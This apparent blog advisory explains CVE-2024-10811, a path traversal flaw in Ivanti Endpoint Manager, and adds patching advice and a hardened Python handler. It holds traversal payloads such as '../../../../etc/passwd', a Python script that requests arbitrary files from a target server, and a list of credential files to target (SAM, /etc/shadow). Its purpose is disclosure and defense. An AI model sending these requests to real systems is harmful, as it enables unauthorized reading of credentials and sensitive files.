CVE-2024-10811 - How Path Traversal in Ivanti EPM Exposes Sensitive Information
Recently, a critical vulnerability—CVE-2024-10811—was discovered in Ivanti Endpoint Manager (EPM). If you use this popular IT management tool, especially versions before the January 2025 Security Update or 2022 SU6 January-2025 Security Update, you need to pay close attention. This post dives into what the bug is, how it can be exploited, and what you should do next. We’ll walk through the vulnerability in plain language and include sample attack code to show the real impact.
What is CVE-2024-10811?
CVE-2024-10811 is an absolute path traversal vulnerability in Ivanti EPM. Path traversal bugs allow attackers to access files stored outside the intended directories—sometimes, even sensitive system files—by manipulating file paths in HTTP requests. What makes this one really dangerous is that it can be exploited remotely and without authentication.
In this case, if you’re running a vulnerable version, an attacker can craft a simple HTTP request to your EPM web service to read any file on your server. This could include database configs, password files, or internal logs—basically, anything the EPM service account can access.
Ivanti rates this vulnerability as high severity given its potential impact.
References
- NVD Entry for CVE-2024-10811
- Ivanti Security Advisory *(Example URL, check with Ivanti for updates)*
How Does the Exploit Work?
The classic attack technique is to use sequences like ../../ (dot-dot-slash) in file paths to reach parent directories. "Absolute" path traversal means the attacker can supply a full (rooted) path like /etc/passwd directly.
Imagine an HTTP endpoint like /api/download?file=report.pdf. The backend code might read any file given in the file parameter — but fails to check if the path leaves the intended directory. Here’s a simplified (vulnerable) code example:
```python
# Example pseudocode: Vulnerable file read logic
def download_file(path):
    # The user-supplied path is concatenated onto the base directory with no check
    # that the result still lies inside /var/www/data/
    with open("/var/www/data/" + path, "rb") as f:
        return f.read()
```
With no filtering, an attacker can request
```
/api/download?file=../../../../etc/passwd
```
or even
```
/api/download?file=/etc/passwd
```
Real-World Exploit Example
To show how easy it can be, here’s a Python snippet simulating an attack against a vulnerable Ivanti EPM server:
```python
import requests

target = "https://victim-epm-server.com"

# Trying to read the Windows hosts file as an example
payload = {
    "file": "C:\\Windows\\System32\\drivers\\etc\\hosts"
}

# This is a hypothetical endpoint, check your Ivanti EPM install
url = f"{target}/api/download"
# verify=False disables TLS certificate validation, as in the original snippet
response = requests.get(url, params=payload, verify=False)

if response.status_code == 200:
    print("[+] Leaked file contents:")
    print(response.text)
else:
    print("[-] Request failed. Status code:", response.status_code)
```
Note: Actual vulnerable endpoints and parameter names depend on your Ivanti EPM version and plugins. But the pattern is the same: attacker sends a request with an arbitrary file path and the server returns the contents.
Examples of sensitive files that could be exposed this way:
- Windows: C:\Windows\System32\config\SAM, C:\Users\Administrator\AppData\...
- Linux: /etc/passwd, /etc/shadow (if permissions allow), /var/log/ivanti/epm/*.log
- Database credentials or backups stored on the host
This could lead to escalation of privileges or a complete takeover if more sensitive files are recovered.
How Do You Fix This?
Apply the official Ivanti security update.
Links
- Ivanti Downloads & Patches *(official portal)*
- CVE-2024-10811 at Mitre
Don't forget to disable public access and restrict Ivanti EPM to trusted networks whenever possible.
Defensive Tips
- Restrict file path input: Only allow file retrieval inside specific directories; never accept full absolute paths from user-controlled data.
- Sanitize user input: Use safe, platform-specific path join functions and validate everything.
- Least privilege: Run Ivanti EPM as a service account with minimal access to sensitive files.
- Monitor logs: Unexpected 200 responses to weird file requests can indicate attempted exploitation.
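The first two tips above, worked through in Python as an added example (this is not Ivanti's code and not the snippet from the post): a hardened version of the download handler that rejects absolute paths and resolves the final path before checking it stays under the base directory. The data directory, the report.pdf file and the probe strings are constructed for the demo.

```python
import os
import tempfile


def unsafe_target(base_dir: str, user_path: str) -> str:
    """What a naive handler would open. os.path.join discards base_dir entirely
    when user_path is absolute, which is exactly an absolute path traversal."""
    return os.path.normpath(os.path.join(base_dir, user_path))


def resolve_inside(base_dir: str, user_path: str):
    """Return the resolved path of user_path under base_dir, or None if it escapes."""
    if not user_path or os.path.isabs(user_path):
        return None
    # A drive letter, colon or backslash has no business in a download name,
    # whichever OS the service runs on.
    if os.path.splitdrive(user_path)[0] or ":" in user_path or "\\" in user_path:
        return None
    base_real = os.path.realpath(base_dir)
    # realpath follows symlinks and collapses "..", so the check below sees the
    # file that would actually be opened, not the string the client sent.
    candidate = os.path.realpath(os.path.join(base_real, user_path))
    try:
        if os.path.commonpath([base_real, candidate]) != base_real:
            return None
    except ValueError:  # paths on different drives (Windows)
        return None
    return candidate


def download_file(base_dir: str, user_path: str) -> bytes:
    """Hardened handler: refuse anything that does not resolve under base_dir."""
    target = resolve_inside(base_dir, user_path)
    if target is None:
        raise PermissionError(f"refusing {user_path!r}: outside {base_dir}")
    with open(target, "rb") as f:
        return f.read()


def demo() -> dict:
    """Constructed scenario: one legitimate report plus the probes from the post."""
    with tempfile.TemporaryDirectory() as base:
        with open(os.path.join(base, "report.pdf"), "wb") as f:
            f.write(b"%PDF-1.4 constructed sample")
        results = {"legit": download_file(base, "report.pdf")}
        for probe in ("../../../../etc/passwd", "/etc/passwd",
                      "C:\\Windows\\System32\\drivers\\etc\\hosts"):
            try:
                download_file(base, probe)
                results[probe] = "served"
            except PermissionError:
                results[probe] = "blocked"
        return results
```

Running `unsafe_target("/var/www/data", "/etc/passwd")` shows the base directory vanishing from the joined path, while `demo()` shows the hardened handler serving only the legitimate file.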
Summary
CVE-2024-10811 is a severe path traversal vulnerability in Ivanti EPM that makes it possible for remote, unauthenticated attackers to steal confidential files from your endpoint management servers.
Patch as soon as possible, and review your exposure to minimize risk. If your server handles sensitive data and isn't patched, it's only a matter of *when*, not *if*, someone tries this attack.
Have questions or want to add your own tips? Drop a comment below.
Timeline
Published on: 01/14/2025 17:15:14 UTC